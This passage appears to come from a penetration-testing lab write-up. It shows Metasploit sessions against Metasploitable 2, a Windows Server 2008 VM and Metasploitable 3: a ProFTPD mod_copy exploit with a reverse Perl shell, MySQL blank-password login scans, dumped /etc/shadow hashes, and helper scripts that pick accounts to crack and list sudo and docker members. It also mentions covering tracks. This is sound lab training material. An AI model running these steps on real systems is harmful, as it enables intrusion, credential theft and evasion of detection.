proftpd:!:14727:0:99999:7:::
statd:*:15474:0:99999:7:::

cat /etc/passwd 
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
backup:x:34:34:backup:/var/backups:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
libuuid:x:100:101::/var/lib/libuuid:/bin/sh
dhcp:x:101:102::/nonexistent:/bin/false
syslog:x:102:103::/home/syslog:/bin/false
klog:x:103:104::/home/klog:/bin/false
sshd:x:104:65534::/var/run/sshd:/usr/sbin/nologin
msfadmin:x:1000:1000:msfadmin,,,:/home/msfadmin:/bin/bash
bind:x:105:113::/var/cache/bind:/bin/false
postfix:x:106:115::/var/spool/postfix:/bin/false
ftp:x:107:65534::/home/ftp:/bin/false
postgres:x:108:117:PostgreSQL administrator,,,:/var/lib/postgresql:/bin/bash
mysql:x:109:118:MySQL Server,,,:/var/lib/mysql:/bin/false
tomcat55:x:110:65534::/usr/share/tomcat5.5:/bin/false
distccd:x:111:65534::/:/bin/false
user:x:1001:1001:just a user,111,,:/home/user:/bin/bash
service:x:1002:1002:,,,:/home/service:/bin/bash
telnetd:x:112:120::/nonexistent:/bin/false
proftpd:x:113:65534::/var/run/proftpd:/bin/false
statd:x:114:65534::/var/lib/nfs:/bin/false

The exploit opens a command shell as the superuser root, which makes it possible to print the files where account and password information is stored. The two files printed are /etc/shadow and /etc/passwd, two text files owned by root that together describe every account on the machine. /etc/passwd is world-readable, but /etc/shadow is readable only by root, so being able to dump it is itself proof of a full compromise.

The first file, /etc/shadow, contains the password hashes, one account per line. The password field itself has three $-separated parts: the scheme identifier ($1$ means md5crypt, the MD5-based crypt(3) scheme), the salt (/avpfBJ1 for root), and the hash computed over the password and that salt. The fields after it hold the day of the last password change (counted from 1 January 1970) and the password ageing policy. A * or ! in place of the hash marks an account that has no password or is locked, so it cannot be logged into with a password at all. md5crypt (1000 rounds of MD5) is weak by today's standards, and the seven real hashes dumped here (root, sys, klog, msfadmin, postgres, user and service) can be fed straight to john or hashcat.

In the second file, /etc/passwd, the first line describes the root user, followed by the system and ordinary user accounts. Each line lists, in this order:

  1. Username

  2. Password field: the x means the real hash is kept in /etc/shadow (on a system without shadow passwords the hash itself would be here)

  3. UID - User ID (0 is root; any other account with UID 0 is root-equivalent)

  4. GID - Group ID

  5. GECOS - the comment field, conventionally the full name of the user or application, room number, work phone number, home phone number and other contact information, separated by commas

  6. Home directory

  7. Login Shell

It is important to note that all the paths specified, e.g. the home directory and login shell, are absolute paths. The login shell also decides whether a hash is worth cracking: an account whose shell is /bin/false or /usr/sbin/nologin cannot log in interactively even with a valid password, which is why klog, despite having a real hash, is not a login target while msfadmin, postgres, user and service are.
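Reading the two dumps together is what turns them into a target list. As an added example (not part of the original write-up), the following Python parses shadow and passwd lines, classifies each password field (real hash and its scheme, locked, or empty), and reports which accounts combine a crackable hash with a login shell, plus every UID 0 account. The sample lines are a subset of the two files dumped from Metasploitable 2 above; the scheme table and the no-login shell list are the usual crypt(3) identifiers and shells, not anything taken from the page.

```python
"""Triage /etc/shadow and /etc/passwd dumps: which accounts carry a real
hash (and of which type), which are locked, and which can log in at all.

Added example, not part of the original write-up. The sample lines are a
subset of the two files dumped from Metasploitable 2 above.
"""
SHADOW = """\
root:$1$/avpfBJ1$x0z8w5UF9Iv./DR9E9Lid.:14747:0:99999:7:::
daemon:*:14684:0:99999:7:::
sys:$1$fUX6BPOt$Miyc3UpOzQJqz4s5wFD9l0:14742:0:99999:7:::
libuuid:!:14684:0:99999:7:::
klog:$1$f2ZVMS4K$R9XkI.CmLdHhdUE3X9jqP0:14742:0:99999:7:::
msfadmin:$1$XN10Zj2c$Rt/zzCW3mLtUWA.ihZjA5/:14684:0:99999:7:::
postgres:$1$Rw35ik.x$MgQgZUuO5pAoUvfJhfcYe/:14685:0:99999:7:::
user:$1$HESu9xrH$k.o3G93DGoXIiQKkPmUgZ0:14699:0:99999:7:::
service:$1$kR3ue7JZ$7GxELDupr5Ohp6cjZ3Bu//:14715:0:99999:7:::
"""

PASSWD = """\
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
libuuid:x:100:101::/var/lib/libuuid:/bin/sh
klog:x:103:104::/home/klog:/bin/false
msfadmin:x:1000:1000:msfadmin,,,:/home/msfadmin:/bin/bash
postgres:x:108:117:PostgreSQL administrator,,,:/var/lib/postgresql:/bin/bash
user:x:1001:1001:just a user,111,,:/home/user:/bin/bash
service:x:1002:1002:,,,:/home/service:/bin/bash
"""

# crypt(3) scheme identifiers found between the first two '$' signs
HASH_ALGOS = {"1": "md5crypt", "2a": "bcrypt", "2b": "bcrypt", "2y": "bcrypt",
              "5": "sha256crypt", "6": "sha512crypt", "y": "yescrypt"}
NOLOGIN_SHELLS = {"/bin/false", "/usr/sbin/nologin", "/sbin/nologin"}


def classify_hash(field):
    """Map a shadow password field to (status, algorithm, salt)."""
    if field == "":
        return ("empty", None, None)           # no password required at all
    if field[0] in "!*":
        return ("locked", None, None)          # '!' locked, '*' never had one
    if field.startswith("$"):
        parts = field.split("$")               # md5crypt: ['', '1', salt, hash]
        scheme = parts[1]
        if scheme in ("2a", "2b", "2y"):       # bcrypt: $2b$cost$<22 salt><31 hash>
            salt = parts[3][:22]
        else:                                  # $id[$rounds=N]$salt$hash
            salt = parts[-2]
        return ("hashed", HASH_ALGOS.get(scheme, "unknown"), salt)
    return ("hashed", "descrypt", field[:2])   # legacy 13-char DES crypt


def parse_shadow(text):
    """{user: {status, algo, salt, last_change_day}} from shadow lines."""
    out = {}
    for line in text.splitlines():
        if not line.strip():
            continue
        f = line.split(":")
        status, algo, salt = classify_hash(f[1])
        out[f[0]] = {"status": status, "algo": algo, "salt": salt,
                     "last_change_day": int(f[2]) if f[2] else None}
    return out


def parse_passwd(text):
    """{user: {uid, gid, gecos, home, shell}} from passwd lines."""
    out = {}
    for line in text.splitlines():
        if not line.strip():
            continue
        name, _pw, uid, gid, gecos, home, shell = line.split(":", 6)
        out[name] = {"uid": int(uid), "gid": int(gid), "gecos": gecos,
                     "home": home, "shell": shell}
    return out


def triage(shadow, passwd):
    """Accounts worth cracking (real hash + login shell) and every UID 0 account."""
    crackable = [u for u, s in shadow.items() if s["status"] == "hashed"
                 and passwd.get(u, {}).get("shell") not in NOLOGIN_SHELLS]
    superusers = [u for u, p in passwd.items() if p["uid"] == 0]
    return {"crackable": crackable, "superusers": superusers}


if __name__ == "__main__":
    shadow, passwd = parse_shadow(SHADOW), parse_passwd(PASSWD)
    result = triage(shadow, passwd)
    for user in result["crackable"]:
        print(f"{user}: {shadow[user]['algo']} salt={shadow[user]['salt']}")
    print("UID 0 accounts:", result["superusers"])
```

On the sample above the crackable list is root, sys, msfadmin, postgres, user and service: klog drops out because its shell is /bin/false, and daemon and libuuid because their fields are * and !. The md5crypt entries go to john with --format=md5crypt or to hashcat with -m 500.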

This machine has been breached.

Windows Server 2008

The second machine is a Windows Server 2008 host with a lot of open ports, several of which the default scan could only label as unknown. The -A scan adds a lot of new information on each port, including the version of each service. A first step is to test whether the MySQL service on port 3306 accepts weak or blank credentials, using the auxiliary module scanner/mysql/mysql_login. This is a login scanner that tries username and password combinations against the server, not an injection attack, and it is driven the same way as the exploit module used on Metasploitable 2: show the options, set RHOSTS to this host, and run.

msf6 auxiliary(scanner/mysql/mysql_login) > options

Module options (auxiliary/scanner/mysql/mysql_login):

   Name              Current Setting  Required  Description
   ----              ---------------  --------  -----------
   BLANK_PASSWORDS   true             no        Try blank passwords for all users
   BRUTEFORCE_SPEED  5                yes       How fast to bruteforce, from 0 to 5
   DB_ALL_CREDS      false            no        Try each user/password couple stored in the current database
   DB_ALL_PASS       false            no        Add all passwords in the current database to the list
   DB_ALL_USERS      false            no        Add all users in the current database to the list
   PASSWORD                           no        A specific password to authenticate with
   PASS_FILE                          no        File containing passwords, one per line
   Proxies                            no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                             yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
   RPORT             3306             yes       The target port (TCP)
   STOP_ON_SUCCESS   false            yes       Stop guessing when a credential works for a host
   THREADS           1                yes       The number of concurrent threads (max one per host)
   USERNAME          root             no        A specific username to authenticate as
   USERPASS_FILE                      no        File containing users and passwords separated by space, one pair per line
   USER_AS_PASS      false            no        Try the username as the password for all users
   USER_FILE                          no        File containing usernames, one per line
   VERBOSE           true             yes       Whether to print output for all attempts

msf6 auxiliary(scanner/mysql/mysql_login) > set RHOSTS 192.168.56.105
RHOSTS => 192.168.56.105
msf6 auxiliary(scanner/mysql/mysql_login) > run

[+] 192.168.56.105:3306   - 192.168.56.105:3306 - Found remote MySQL version 5.0.51a
[!] 192.168.56.105:3306   - No active DB -- Credential data will not be saved!
[+] 192.168.56.105:3306   - 192.168.56.105:3306 - Success: 'root:'
[*] 192.168.56.105:3306   - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

For the next step, Gaining Persistence, use the credential pair the module found: username root with an empty password, which is what successfully authenticated to the remote MySQL server. One check before relying on it: the module printed the version banner 5.0.51a, which is the MySQL version the -A scan attributed to Metasploitable 2, whereas this host answered with MySQL 5.5.20, so re-run the module and confirm the banner matches the target, then verify the login by hand with the native client (mysql -h 192.168.56.105 -u root). With an empty password the client sends a zero-length auth response, which is easy to spot in the Wireshark capture.
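The -A scan reported the auth plugin (mysql_native_password) and a 20-byte salt for this host, which is enough to show what the login in the capture actually carries. As an added example (not the page's or Metasploit's code), the following Python implements both sides of mysql_native_password: the client-side scramble, what the server stores in mysql.user, and the server-side check. SALT is the value from the -A scan of 192.168.56.105:3306 above; the password "vagrant" is made up for illustration and is not a claim about this host.

```python
"""mysql_native_password on the wire: how the 20-byte salt nmap printed for
192.168.56.105:3306 is combined with the password, and why a blank root
password is visible at a glance in a packet capture.

Added example, not the page's code. SALT is the value from the -A scan above;
the password "vagrant" is made up for illustration.
"""
import hashlib

SALT = b"B/_sFAQV;ekiO0>)Q;sU"   # 20-byte challenge from the server greeting


def mysql_password_hash(password: bytes) -> str:
    """What mysql.user stores for mysql_native_password: '*' + hex(SHA1(SHA1(pw))).
    An account with an empty password has an empty authentication string."""
    if not password:
        return ""
    return "*" + hashlib.sha1(hashlib.sha1(password).digest()).hexdigest().upper()


def native_password_scramble(password: bytes, salt: bytes) -> bytes:
    """Client auth-response: SHA1(pw) XOR SHA1(salt || SHA1(SHA1(pw))).

    The salt changes per handshake, so a captured token cannot be replayed
    under a new one. An empty password sends a zero-length token, which is
    exactly what the blank 'root:' login above looks like on the wire."""
    if len(salt) != 20:
        raise ValueError("mysql_native_password needs a 20-byte salt")
    if not password:
        return b""
    stage1 = hashlib.sha1(password).digest()
    stage2 = hashlib.sha1(stage1).digest()          # the value the server stores
    mask = hashlib.sha1(salt + stage2).digest()
    return bytes(a ^ b for a, b in zip(stage1, mask))


def server_verify(stored: str, salt: bytes, token: bytes) -> bool:
    """Server side: unmask SHA1(pw) from the token and check it against storage."""
    if stored == "":
        return token == b""                         # blank password: empty token wins
    if len(token) != 20 or not stored.startswith("*"):
        return False
    stage2 = bytes.fromhex(stored[1:])
    mask = hashlib.sha1(salt + stage2).digest()
    stage1 = bytes(a ^ b for a, b in zip(token, mask))
    return hashlib.sha1(stage1).digest() == stage2   # preimage check, not equality of tokens


if __name__ == "__main__":
    for pw in (b"", b"vagrant"):
        tok = native_password_scramble(pw, SALT)
        print(f"password={pw!r:12} stored={mysql_password_hash(pw)!r} token_len={len(tok)}")
```

The design point worth noticing is that the server never receives SHA1(password); it receives the XOR with a salt-dependent mask and only checks that hashing the unmasked value reproduces what it stores. Knowing the stored '*...' string therefore does not let a client log in, but a blank password short-circuits all of that, which is why mysql_login with BLANK_PASSWORDS true is the right first probe.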

Linux 14.04

This Ubuntu machine also has a handful of open ports. The first is the FTP port, served by ProFTPD 1.3.5, for which the Metasploit Framework has a matching exploit, ProFTPD 1.3.5 Mod_Copy Command Execution (CVE-2015-3306): mod_copy's SITE CPFR and SITE CPTO commands could be issued without logging in, and the module abuses them to copy a PHP payload into the web root and then triggers it with an HTTP request. That is why the module needs both an FTP port and an HTTP port plus a writable SITEPATH, and why LHOST for the reverse_perl payload has to be set to Kali's address on the host-only network before running it. This exploit will, hopefully, give a shell on the machine, which will show what permissions the shell has, as well as which other users, especially superusers, exist on it.

msf6 > search proftpd

Matching Modules
================

   #  Name                                         Disclosure Date  Rank       Check  Description
   -  ----                                         ---------------  ----       -----  -----------
   0  exploit/linux/misc/netsupport_manager_agent  2011-01-08       average    No     NetSupport Manager Agent Remote Buffer Overflow
   1  exploit/linux/ftp/proftp_sreplace            2006-11-26       great      Yes    ProFTPD 1.2 - 1.3.0 sreplace Buffer Overflow (Linux)
   2  exploit/freebsd/ftp/proftp_telnet_iac        2010-11-01       great      Yes    ProFTPD 1.3.2rc3 - 1.3.3b Telnet IAC Buffer Overflow (FreeBSD)
   3  exploit/linux/ftp/proftp_telnet_iac          2010-11-01       great      Yes    ProFTPD 1.3.2rc3 - 1.3.3b Telnet IAC Buffer Overflow (Linux)
   4  exploit/unix/ftp/proftpd_modcopy_exec        2015-04-22       excellent  Yes    ProFTPD 1.3.5 Mod_Copy Command Execution
   5  exploit/unix/ftp/proftpd_133c_backdoor       2010-12-02       excellent  No     ProFTPD-1.3.3c Backdoor Command Execution


Interact with a module by name or index. For example info 5, use 5 or use exploit/unix/ftp/proftpd_133c_backdoor

msf6 > use 4
msf6 exploit(unix/ftp/proftpd_modcopy_exec) > set payload cmd/unix/reverse_perl
payload => cmd/unix/reverse_perl
msf6 exploit(unix/ftp/proftpd_modcopy_exec) > options

Module options (exploit/unix/ftp/proftpd_modcopy_exec):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                      yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
   RPORT      80               yes       HTTP port (TCP)
   RPORT_FTP  21               yes       FTP port
   SITEPATH   /var/www         yes       Absolute writable website path
   SSL        false            no        Negotiate SSL/TLS for outgoing connections
   TARGETURI  /                yes       Base path to the website
   TMPPATH    /tmp             yes       Absolute writable path
   VHOST                       no        HTTP server virtual host


Payload options (cmd/unix/reverse_perl):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST                   yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   ProFTPD 1.3.5


msf6 exploit(unix/ftp/proftpd_modcopy_exec) > set RHOSTS 192.168.56.106
RHOSTS => 192.168.56.106
msf6 exploit(unix/ftp/proftpd_modcopy_exec) > set SITEPATH /var/www/html
SITEPATH => /var/www/html
msf6 exploit(unix/ftp/proftpd_modcopy_exec) > set LHOST 192.168.56.104
LHOST => 192.168.56.104
msf6 exploit(unix/ftp/proftpd_modcopy_exec) > run

[*] Started reverse TCP handler on 192.168.56.104:4444 
[*] 192.168.56.106:80 - 192.168.56.106:21 - Connected to FTP server
[*] 192.168.56.106:80 - 192.168.56.106:21 - Sending copy commands to FTP server
[*] 192.168.56.106:80 - Executing PHP payload /Zt2Xir.php
[*] Command shell session 3 opened (192.168.56.104:4444 -> 192.168.56.106:49173) at 2021-09-17 14:25:01 -0400

id 
uid=33(www-data) gid=33(www-data) groups=33(www-data)

whoami
www-data

hostname
metasploitable3-ub1404

ls /home
anakin_skywalker
artoo_detoo
ben_kenobi
boba_fett
c_three_pio
chewbacca
darth_vader
greedo
han_solo
jabba_hutt
jarjar_binks
kylo_ren
lando_calrissian
leia_organa
luke_skywalker
vagrant

id 
uid=33(www-data) gid=33(www-data) groups=33(www-data)

id vagrant 
uid=900(vagrant) gid=900(vagrant) groups=900(vagrant),27(sudo)

id luke_skywalker
uid=1112(luke_skywalker) gid=100(users) groups=100(users),27(sudo)

id leia_organa
uid=1111(leia_organa) gid=100(users) groups=100(users),27(sudo)

id lando_calrissian
uid=1120(lando_calrissian) gid=100(users) groups=100(users)

id kylo_ren
uid=1125(kylo_ren) gid=100(users) groups=100(users)

id darth_vader
uid=1117(darth_vader) gid=100(users) groups=100(users)

id anakin_skywalker
uid=1118(anakin_skywalker) gid=100(users) groups=100(users)

id han_solo
uid=1113(han_solo) gid=100(users) groups=100(users),27(sudo)

id greedo
uid=1123(greedo) gid=100(users) groups=100(users),999(docker)


cat /etc/passwd 
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
libuuid:x:100:101::/var/lib/libuuid:
syslog:x:101:104::/home/syslog:/bin/false
messagebus:x:102:106::/var/run/dbus:/bin/false
sshd:x:103:65534::/var/run/sshd:/usr/sbin/nologin
statd:x:104:65534::/var/lib/nfs:/bin/false
vagrant:x:900:900:vagrant,,,:/home/vagrant:/bin/bash
dirmngr:x:105:111::/var/cache/dirmngr:/bin/sh
leia_organa:x:1111:100::/home/leia_organa:/bin/bash
luke_skywalker:x:1112:100::/home/luke_skywalker:/bin/bash
han_solo:x:1113:100::/home/han_solo:/bin/bash
artoo_detoo:x:1114:100::/home/artoo_detoo:/bin/bash
c_three_pio:x:1115:100::/home/c_three_pio:/bin/bash
ben_kenobi:x:1116:100::/home/ben_kenobi:/bin/bash
darth_vader:x:1117:100::/home/darth_vader:/bin/bash
anakin_skywalker:x:1118:100::/home/anakin_skywalker:/bin/bash
jarjar_binks:x:1119:100::/home/jarjar_binks:/bin/bash
lando_calrissian:x:1120:100::/home/lando_calrissian:/bin/bash
boba_fett:x:1121:100::/home/boba_fett:/bin/bash
jabba_hutt:x:1122:100::/home/jabba_hutt:/bin/bash
greedo:x:1123:100::/home/greedo:/bin/bash
chewbacca:x:1124:100::/home/chewbacca:/bin/bash
kylo_ren:x:1125:100::/home/kylo_ren:/bin/bash
mysql:x:106:112:MySQL Server,,,:/nonexistent:/bin/false
avahi:x:107:114:Avahi mDNS daemon,,,:/var/run/avahi-daemon:/bin/false
colord:x:108:116:colord colour management daemon,,,:/var/lib/colord:/bin/false
vboxadd:x:999:1::/var/run/vboxadd:/bin/false

ls
8xed2.php
PFy479.php
Zt2Xir.php
chat
drupal
payroll_app.php
phpmyadmin
sYRf3g.php

^C 
Abort session 3? [y/N]  y

[*] 192.168.56.106 - Command shell session 3 closed.  Reason: User exit
msf6 exploit(unix/ftp/proftpd_modcopy_exec) >

Sampling the users with id shows that several of them (vagrant, luke_skywalker, leia_organa, han_solo) belong to the sudo group, meaning they can obtain elevated privileges, and that greedo belongs to the docker group, which is commonly treated as equivalent to root because its members can run containers that mount the host filesystem. The command shell itself opens as www-data, the unprivileged account the web server runs as, so it has no elevated privileges, but it can read /etc/passwd and look around the default installation of the website in /var/www/html.
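The checks above run id against accounts picked by hand, which is easy to get wrong on a machine with this many users. The script below, added here as an example and not part of the original write-up, does the same check exhaustively in one pass over /etc/passwd and /etc/group (both world-readable, so it works from the www-data shell): it prints every account with a real login shell that belongs to any of the groups named on the command line. The sample files it writes for an offline run are constructed from the accounts and group memberships seen in the output above, plus one made-up no-login account placed in sudo to show that the shell filter drops it.

```sh
#!/bin/sh
# Added example, not from the original write-up: list every account that can
# log in and belongs to one of the given groups, from /etc/passwd and
# /etc/group (both world-readable, so this works from the www-data shell).
#
# Usage on the target:  privileged_members /etc/passwd /etc/group "sudo docker"

privileged_members() {
    passwd_file=$1
    group_file=$2
    wanted=$3    # space-separated group names to look for

    awk -F: -v wanted="$wanted" '
        BEGIN { n = split(wanted, w, " "); for (i = 1; i <= n; i++) want[w[i]] = 1 }
        # First input (passwd): remember accounts with a real login shell.
        FNR == NR { if ($7 !~ /(nologin|false)$/) login[$1] = 1; next }
        # Second input (group): print members of the wanted groups.
        ($1 in want) {
            m = split($4, members, ",")
            for (i = 1; i <= m; i++)
                if (members[i] in login) print members[i] ":" $1
        }
    ' "$passwd_file" "$group_file" | LC_ALL=C sort
}

# Constructed sample mirroring the target's accounts (memberships as seen in
# the id output above); the mysql account in sudo is made up, to show that a
# member without a login shell is dropped.
write_samples() {
    cat > "$1" <<'EOF'
root:x:0:0:root:/root:/bin/bash
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
sshd:x:103:65534::/var/run/sshd:/usr/sbin/nologin
vagrant:x:900:900:vagrant,,,:/home/vagrant:/bin/bash
leia_organa:x:1111:100::/home/leia_organa:/bin/bash
luke_skywalker:x:1112:100::/home/luke_skywalker:/bin/bash
han_solo:x:1113:100::/home/han_solo:/bin/bash
greedo:x:1123:100::/home/greedo:/bin/bash
kylo_ren:x:1125:100::/home/kylo_ren:/bin/bash
mysql:x:106:112:MySQL Server,,,:/nonexistent:/bin/false
EOF
    cat > "$2" <<'EOF'
root:x:0:
sudo:x:27:vagrant,leia_organa,luke_skywalker,han_solo,mysql
users:x:100:
docker:x:999:greedo
EOF
}

# Demo run against the constructed files:  ./privileged_members.sh --demo
if [ "${1:-}" = "--demo" ]; then
    write_samples /tmp/passwd.sample /tmp/group.sample
    privileged_members /tmp/passwd.sample /tmp/group.sample "sudo docker"
fi
```

On the real target the function only needs the two system files and the group names; docker is worth including alongside sudo because, as noted above, membership of that group is as good as root.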

One thing to note is how the exploit works: mod_copy's SITE CPFR and SITE CPTO commands, which ProFTPD 1.3.5 accepts without authentication (CVE-2015-3306), copy a file containing PHP into the web root given as SITEPATH, and the module then requests that file over HTTP to run the payload. The result is a .php file left behind on the target (here /var/www/html/Zt2Xir.php; the listing above also shows 8xed2.php, PFy479.php and sYRf3g.php, named in the same pattern and most likely left over from earlier runs of the module). These files will have to be removed later on, in the Covering Tracks section, to cover the attacker's tracks.

Gaining Persistence

After gaining access to the machines, find a way to keep that access, so that even if the exploited vulnerability is fixed or the service is restarted, the machine can still be reached.

Metasploitable 2

As shown in the scan, the Metasploitable 2 machine has a MySQL service running on port 3306. Previously, access was gained as the superuser. Can superuser credentials also be used to log in to the MySQL server with full privileges and read its databases? Test it out.

msf6 > search mysql

Matching Modules
================

   #   Name                                                  Disclosure Date  Rank       Check  Description
   -   ----                                                  ---------------  ----       -----  -----------
   0   auxiliary/server/capture/mysql                                         normal     No     Authentication Capture: MySQL
   1   exploit/windows/http/cayin_xpost_sql_rce              2020-06-04       excellent  Yes    Cayin xPost wayfinder_seqid SQLi to RCE
   2   auxiliary/gather/joomla_weblinks_sqli                 2014-03-02       normal     Yes    Joomla weblinks-categories Unauthenticated SQL Injection Arbitrary File Read
   3   exploit/unix/webapp/kimai_sqli                        2013-05-21       average    Yes    Kimai v0.9.2 'db_restore.php' SQL Injection
   4   exploit/linux/http/librenms_collectd_cmd_inject       2019-07-15       excellent  Yes    LibreNMS Collectd Command Injection
   5   post/linux/gather/enum_configs                                         normal     No     Linux Gather Configurations
   6   post/linux/gather/enum_users_history                                   normal     No     Linux Gather User History
   7   auxiliary/scanner/mysql/mysql_writable_dirs                            normal     No     MYSQL Directory Write Test
   8   auxiliary/scanner/mysql/mysql_file_enum                                normal     No     MYSQL File/Directory Enumerator
   9   auxiliary/scanner/mysql/mysql_hashdump                                 normal     No     MYSQL Password Hashdump
   10  auxiliary/scanner/mysql/mysql_schemadump                               normal     No     MYSQL Schema Dump
   11  exploit/multi/http/manage_engine_dc_pmp_sqli          2014-06-08       excellent  Yes    ManageEngine Desktop Central / Password Manager LinkViewFetchServlet.dat SQL Injection
   12  auxiliary/admin/http/manageengine_pmp_privesc         2014-11-08       normal     Yes    ManageEngine Password Manager SQLAdvancedALSearchResult.cc Pro SQL Injection
   13  post/multi/manage/dbvis_add_db_admin                                   normal     No     Multi Manage DbVisualizer Add Db Admin
   14  auxiliary/scanner/mysql/mysql_authbypass_hashdump     2012-06-09       normal     No     MySQL Authentication Bypass Password Dump
   15  auxiliary/admin/mysql/mysql_enum                                       normal     No     MySQL Enumeration Module
   16  auxiliary/scanner/mysql/mysql_login                                    normal     No     MySQL Login Utility
   17  auxiliary/admin/mysql/mysql_sql                                        normal     No     MySQL SQL Generic Query
   18  auxiliary/scanner/mysql/mysql_version                                  normal     No     MySQL Server Version Enumeration
   19  exploit/linux/mysql/mysql_yassl_getname               2010-01-25       good       No     MySQL yaSSL CertDecoder::GetName Buffer Overflow
   20  exploit/linux/mysql/mysql_yassl_hello                 2008-01-04       good       No     MySQL yaSSL SSL Hello Message Buffer Overflow
   21  exploit/windows/mysql/mysql_yassl_hello               2008-01-04       average    No     MySQL yaSSL SSL Hello Message Buffer Overflow
   22  exploit/multi/mysql/mysql_udf_payload                 2009-01-16       excellent  No     Oracle MySQL UDF Payload Execution
   23  exploit/windows/mysql/mysql_start_up                  2012-12-01       excellent  Yes    Oracle MySQL for Microsoft Windows FILE Privilege Abuse
   24  exploit/windows/mysql/mysql_mof                       2012-12-01       excellent  Yes    Oracle MySQL for Microsoft Windows MOF Execution
   25  exploit/linux/http/pandora_fms_events_exec            2020-06-04       excellent  Yes    Pandora FMS Events Remote Command Execution
   26  auxiliary/analyze/crack_databases                                      normal     No     Password Cracker: Databases
   27  exploit/windows/mysql/scrutinizer_upload_exec         2012-07-27       excellent  Yes    Plixer Scrutinizer NetFlow and sFlow Analyzer 9 Default MySQL Credential
   28  auxiliary/admin/http/rails_devise_pass_reset          2013-01-28       normal     No     Ruby on Rails Devise Authentication Password Reset
   29  auxiliary/admin/tikiwiki/tikidblib                    2006-11-01       normal     No     TikiWiki Information Disclosure
   30  exploit/multi/http/wp_db_backup_rce                   2019-04-24       excellent  Yes    WP Database Backup RCE
   31  exploit/unix/webapp/wp_google_document_embedder_exec  2013-01-03       normal     Yes    WordPress Plugin Google Document Embedder Arbitrary File Disclosure
   32  exploit/multi/http/zpanel_information_disclosure_rce  2014-01-30       excellent  No     Zpanel Remote Unauthenticated RCE


Interact with a module by name or index. For example info 32, use 32 or use exploit/multi/http/zpanel_information_disclosure_rce

msf6 > use 16
msf6 auxiliary(scanner/mysql/mysql_login) > options

Module options (auxiliary/scanner/mysql/mysql_login):

   Name              Current Setting  Required  Description
   ----              ---------------  --------  -----------
   BLANK_PASSWORDS   true             no        Try blank passwords for all users
   BRUTEFORCE_SPEED  5                yes       How fast to bruteforce, from 0 to 5
   DB_ALL_CREDS      false            no        Try each user/password couple stored in the current database
   DB_ALL_PASS       false            no        Add all passwords in the current database to the list
   DB_ALL_USERS      false            no        Add all users in the current database to the list
   PASSWORD                           no        A specific password to authenticate with
   PASS_FILE                          no        File containing passwords, one per line
   Proxies                            no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                             yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
   RPORT             3306             yes       The target port (TCP)
   STOP_ON_SUCCESS   false            yes       Stop guessing when a credential works for a host
   THREADS           1                yes       The number of concurrent threads (max one per host)
   USERNAME          root             no        A specific username to authenticate as
   USERPASS_FILE                      no        File containing users and passwords separated by space, one pair per line
   USER_AS_PASS      false            no        Try the username as the password for all users
   USER_FILE                          no        File containing usernames, one per line
   VERBOSE           true             yes       Whether to print output for all attempts

msf6 auxiliary(scanner/mysql/mysql_login) > set RHOSTS 192.168.56.101
RHOSTS => 192.168.56.101
msf6 auxiliary(scanner/mysql/mysql_login) > run

[+] 192.168.56.101:3306   - 192.168.56.101:3306 - Found remote MySQL version 5.0.51a
[!] 192.168.56.101:3306   - No active DB -- Credential data will not be saved!
[+] 192.168.56.101:3306   - 192.168.56.101:3306 - Success: 'root:'
[*] 192.168.56.101:3306   - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf6 auxiliary(scanner/mysql/mysql_login) > mysql -u root -p -h 192.168.56.101
[*] exec: mysql -u root -p -h 192.168.56.101

Enter password: 
Welcome to the MariaDB monitor.  Commands end with ; or \g.
Your MySQL connection id is 21
Server version: 5.0.51a-3ubuntu5 (Ubuntu)

Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.

